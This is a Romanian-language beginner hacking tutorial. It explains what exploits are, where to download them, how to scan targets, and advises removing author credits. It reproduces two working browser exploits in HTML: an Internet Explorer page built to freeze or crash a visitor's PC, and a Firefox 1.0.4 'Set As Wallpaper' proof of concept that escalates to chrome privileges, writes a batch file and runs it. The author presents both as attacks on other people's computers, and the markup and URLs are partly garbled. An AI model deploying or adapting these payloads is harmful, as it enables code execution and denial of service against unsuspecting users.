Gauri de Securitate -part 1- EXPLOITS Exploits sunt script-uri create de hackeri pt a avea acces la Servere deamond,linux... Am creat acest tutorial deoarce nu multi stiu ce este un exploit si poate majoritatea nici nu au auzit.Va voi arata in continuare pasii pt acesare un shell(script kiddley). La un exploit se gaseste doar codul sursa.El se compileaza folosind un Compilator adecvat pt acel cod sursa.Puteti face rost de un exploit de pe http://www.packetstormsecurity.nl , httpwww.securityfocus.com pt inceput compilatil httpdownload.kappa.roaction__categoryid__46.De obicei exploits sunt pt Linux dar daca aveti alt sistem de operare nu va faceti griji puteti sa il rulati direct din Command-Promt sau Shell mai sunt si alte exploit care nu trebuiesc compilate cum ar fi scripturile in php si js acestea se introduc in sursa Pagini. Cum adunam date despre server(HTTP sau PC..)pai daca este un sever HTTP cautam un scaner pt cgi-bin care ne arata versiunea servarului si Bug-urile nepatch-uite din server si ne ajuta la injection ... cateva pagini folosite de admini pt loagare.Daca este un computer noramal vom folosi un Who IS sau un scaner de porturi professional(trebuie sa ne de mai multe indici) Recomand GFI sau SuperScan.Odata ce am aflta ce sistem are si celelalte informati cautam un exploit pe adresele mentionate mai sus.Aveti grija incercati sa modificati databese daca vedeti ca da eroare cand incercati sa o compilati ar trebui modificata ,dar mai intai trebuie sa va asigurati ca codul nu contine INFORMATI sau CREDITS.Cele mai multe au erori din cauza linilor puse de eroare diferitelor Pagin,programe,etc. Mozilla Firefox=1.0.4 Set As Wallpaper Va voi prezenta un exploit care mi-a placut foarte mult.El exploateaza un bug in Mozilla asfel un java-script aflat in spatele comenzilor de Wallpaper div style=positionrelative; width300px; height250px; img src=javascript asfel pacalind Browserul.Un trick care mie mi-a placut foarte mult din IE(all version) era blocare PC si resetare acesta procedura era posibila deoarce IE nu avea o optiune anume pt poze asa ce o afisa pe toata.Codul sursa trebuie copiat intr-o pagina HTML.el trebui introdus in BODY. !DOCTYPE html PUBLIC -W3CDTD XHTML 1.0 StrictEN httpwww.w3.orgTRxhtml1DTDxhtml1-strict.dtd html head title(title meta name=keywords content=microsoft,windows,img,bug,html head body p img src=pic.png width=9999999 height=9999999 alt=puh If you are using Microsoft Windows and are able to read this, feel lucky!br A tip Quit your web browser immediately and pray that your unsaved documents get saved!br iframe src=httpwww.idg.seArticlePages2005060920050609095128_MD20050609095128_MD.dbp.asp width=1024 height=768 br p body html sa revenim la Mozilla.Atentie codul sursa trebuie inserat si el tot intr-o pagina html il puteti folosi si pe primul si pe al doilea ca sa va asigurati ca nu ati muncit degeaba in momentul acela se reseteaza pc-ul cuiva(in caz ca fol IE)In caz ca fol alt browser inafara de cele mentionate mai sus Toate celelate sunt copy dupa IE inafara de Opera care il recomand sa il folositi cu toti pt ca nu am gasit nici un bug deocamdata. eliminati Creditul. Exploit by Michael Krax !DOCTYPE HTML PUBLIC -W3CDTD HTML 4.01 TransitionalEN html head titleFirewalling - Proof-of-Concepttitle script function stopload() { in some cases the javascript url never stops to load therefore we force a stop after the real image got loaded window.setTimeout(window.stop(),1000); } script head body div style=font-familyVerdana;font-size11px; div style=font-familyVerdana;font-size15px;font-weightbold; Firewalling - Proof-of-Conceptdiv div style=width600px The Set As Wallpaper dialog takes the image url as a parameter without validating it. This allows to execute javascript in chrome and to run arbitrary code. brbr By using absolute positioning and the moz-opacity filter an attacker can easily fool the user to think he is setting a valid image as wallpaper. brbr Right click on the image and choose Set As Wallpaper. The demo requests UniversalXPConnect rights, creates cbooom.bat and launches the batch file that shows a directoy listing in a dos box (Windows only). brbr div style=positionrelative; width300px; height250px; img src=javascript-----------------------------eval('if(document.location.href. substr(0,6)=='chrome'){netscape.security.Privile geManager.enablePrivilege(' UniversalXPConnect');file=Components.classes['@mozilla.orgfilelocal;1']. createInstance(Components.interfaces.nsILocalFile) ;file.initWithPath('c booom.bat');file.createUnique(Components.interfac es.nsIFile.NORMAL_FILE_TYPE, 420);outputStream=Components.classes['@mozilla.orgnetworkfile-output-stream; 1'].createInstance(Components.interfaces.nsIFileOutpu tStream);outputStream.init (file,0x040x080x20,420,0);output='@ECHO OFFnBEGINnCLSnDIRnPAUSE nEND';outputStream.write(output,output.length) ;outputStream.close();file.launch ();}else{void(0)}') width=300 height=250 alt= border=0 style=position absolute; left0px; top0px; z-index2; -moz-opacity0; img src=httpwww.site.comimageslogo.png width=300 height=250 alt= border=0 style=position absolute; left0px; top0px; z-index1; onload=stopload() div div body html
